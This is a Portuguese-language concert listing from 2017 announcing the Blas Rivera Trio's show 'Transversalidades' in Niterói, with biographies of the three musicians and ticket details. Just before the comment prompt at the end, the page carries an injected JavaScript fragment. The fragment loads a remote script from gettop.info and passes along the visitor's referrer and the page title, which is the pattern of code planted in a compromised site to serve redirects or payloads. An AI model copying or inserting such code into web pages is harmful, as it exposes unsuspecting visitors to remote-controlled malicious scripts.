Escrito por em 8 set 2017 nas áreas Jazz/Blues, Programação, Rio de Janeiro, Show

Blas Rivera Trio apresenta show Transversalidades no Teatro Municipal de Niterói.

 

O Blas Rivera Trio apresenta, no dia 15 de setembro, às 20h, no Teatro Municipal de Niterói, o show Transversalidades – um percurso musical que cruza culturas, terras, estilos, por meio da música instrumental e dos ritmos sul-americanos. O trio, formado pelos músicos Blas Rivera (piano e saxofone), David Chew (violoncelo) e Martín Lima (bandoneon), faz uma releitura de ritmos e sonoridades sul-americanas e de outras partes do mundo, integrando diversidades.

Destaque para as composições de Rivera gravadas entre Rio, Madri e Buenos Aires, com artistas de várias partes do mundo, entre outras canções e compositores como Astor Piazzola e J.S. Bach. Tangos, milongas, candombes, forrós e jazz – ritmos que influenciaram os músicos em suas carreiras e que mesclam o erudito, o tango, o jazz. O show tem a participação dos bailarinos de tango Cecília Gonzalez e André Carvalho, em uma performance que traz ao público um clima contemporâneo dos ritmos sul-americanos.

Transversalidades estreou no Rio de Janeiro em abril e agora chega a Niterói. Nesse trabalho, o grupo faz uma releitura de ritmos e sonoridades sul-americanas e de outras partes do mundo, integrando diversidades. Música popular em sua raiz tratada com técnicas eruditas, combinação de timbres de instrumentos que nasceram eruditos – sax e bandoneon – e se transformaram em populares. Instrumentos como violoncelo e piano que agora participam do mundo da música popular. Mistura de terras, Argentina, Brasil, Inglaterra. Mistura de línguas, sabores, épocas, exílios e retornos que interagem num mosaico sonoro.

O repertório traz a inédita Hasta que vuelvas (que fala de uma dor muito grande, de abandono, e também de uma lenda), Milonga sudaca (sudaca é como os europeus chamam os sul-americanos), Nocturno (dedicada a Frederico Fellini) e Cancion para conquistar a la bailarina, todas de autoria de Blas Rivera. Para o músico, “o destaque é para a inesquecível música de Piazzola, Oblivion, reinventada com o choro maravilhoso do violoncelo conversando com o bandoneon, e Ária da quarta corda, numa versão com jazz, tango e pura alma infiltrada na melodia de Bach”.

 

Blas Rivera Trio

Natural de Córdoba, Argentina, o saxofonista, pianista, compositor e arranjador Blas Rivera, sob a influência do rock e da música clássica, apaixonou-se por jazz e bossa nova, e atualmente leva seu tango-jazz por vários países do mundo. Em 1999, foi reconhecido como “músico revelação” no Festival de Jazz de Montreux. Com o tango pulsando nas veias, exímio instrumentista e compositor de sensibilidade requintada, dividiu o palco com grandes nomes, como Fernando Suarez Paz, Pablo Ziegler, Paulo Moura, Marcos Suzano, Yamandu Costa. Rivera gravou seu primeiro CD em 1997 e desde então vem se apresentando em várias cidades do país e do exterior, em festivais, concertos e shows (Festival Villa Lobos, Búzios Jazz & Blues, Rio International Cello Encounter e Festival de Inverno Dell’Arte). Também se apresentou em renomados espaços culturais no Rio de Janeiro (Sala Funarte, Teatro do Ibam, Sesc Copacabana, Espaço Tom Jobim, Centro de Referência da Música Carioca, Teatro Nelson Rodrigues, BNDES, CCBB, dentre outros), Niterói (Teatro Municipal João Caetano), Petrópolis (Palácio de Cristal), São Paulo (Sesc Paulista, Sesc Vila Mariana). Na Argentina, tocou em Buenos Aires, (Salón Blanco de La Casa Rosada, para a presidente Cristina Kirchener), Mendoza e Córdoba. Fez shows em Madri (Espanha), Paris (França) Hamburgo, Stuttgart e Bonn (Alemanha), Brienz (Suíça) e Istambul (Turquia). Como professor de música há mais de 30 anos – teoria musical, piano, saxofone, desde 2008, vem desenvolvendo uma larga experiência na realização de oficinas e workshops de musicalidade e de improvisação, oferecidos em diversas cidades da Europa e Argentina. Em sua turnê na Europa, em 2016, Blas Rivera fez shows e workshops de musicalidade para dançarinos na Suíça (Zurique, Lugano e Ticino), Itália (Napoli e Sardenha) e França (Paris).

O violoncelista David Chew é provavelmente o mais carioca dos músicos ingleses. Apaixonado pelo Brasil e pela música de nosso país, participa com entusiasmo de iniciativas artísticas promovendo o intercâmbio e a quebra de barreiras entre os diversos gêneros musicais. Simultaneamente se dedica ao elegante e amplo repertório de câmara para o seu instrumento, procurando oferecer as mais belas páginas dos grandes mestres ao público brasileiro ao lado de importantes nomes do cenário musical. Fundador e diretor artístico do International Cello Encounter reúne no Rio de Janeiro os maiores nomes do instrumento para concertos.

Martín Lima nasceu em Buenos Aires, em 1982. Estudou com destacados bandoneonistas como Martín Benedetti, Osvaldo Montes, Néstor Marconi e Martín Sued. Entre os anos de 2001 e 2004, integrou as orquestras típicas de tango Camino Negro, Industria Típica, La Winco. Em 2005, formou com Mariano Ciruela Giorgi, o Duo Mutango. Com seu projeto Tango de Ru@, em 2007, percorreu grande parte do continente sul-americano como Brasil, Argentina, Bolívia, Peru, Equador e Venezuela. Em 2008, formou no Brasil o Instrumentango, com o pianista Josué Jeffer, e começou um ciclo na livraria Arlequim no Rio de Janeiro. Em 2012, retornou a Buenos Aires onde formou o Sexteto Acquaforte, apresentando-se na Casa de Cultura, Legislatura Portenha, Canal 7, Torcuato Tasso, Salón Canning e Café Vinilo, entre outros. Grava com o sexteto o CD Tango, lançado no Rio de Janeiro e faz quatro turnês ao Brasil em 2013, com apresentações em Casarão Ameno Resedá, Café Pequeno, Arlequim, Semente, entre outros. Em 2014, volta a residir no Brasil e integra a companhia Tango e Paixão, de São Paulo. É convidado a participar da Banda Sinfônica de São Paulo para o espetáculo O tango e suas histórias.

Blas Rivera Trio

 

SERVIÇO:

 

Show “Transversalidades”

Blas Rivera Trio

 

15 de setembro, sexta-feira, às 20h

Teatro Municipal de Niterói (R. Quinze de novembro, 35, Centro – Niterói. Tels.: 21 2620-1624 e 2719-9549)

 

Ingressos: R$ 60, com meia-entrada para estudantes e pessoas com mais de 60 anos

 

Sugestão etária: livre

Duração aproximada: 80 minutos

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Faça seu comentário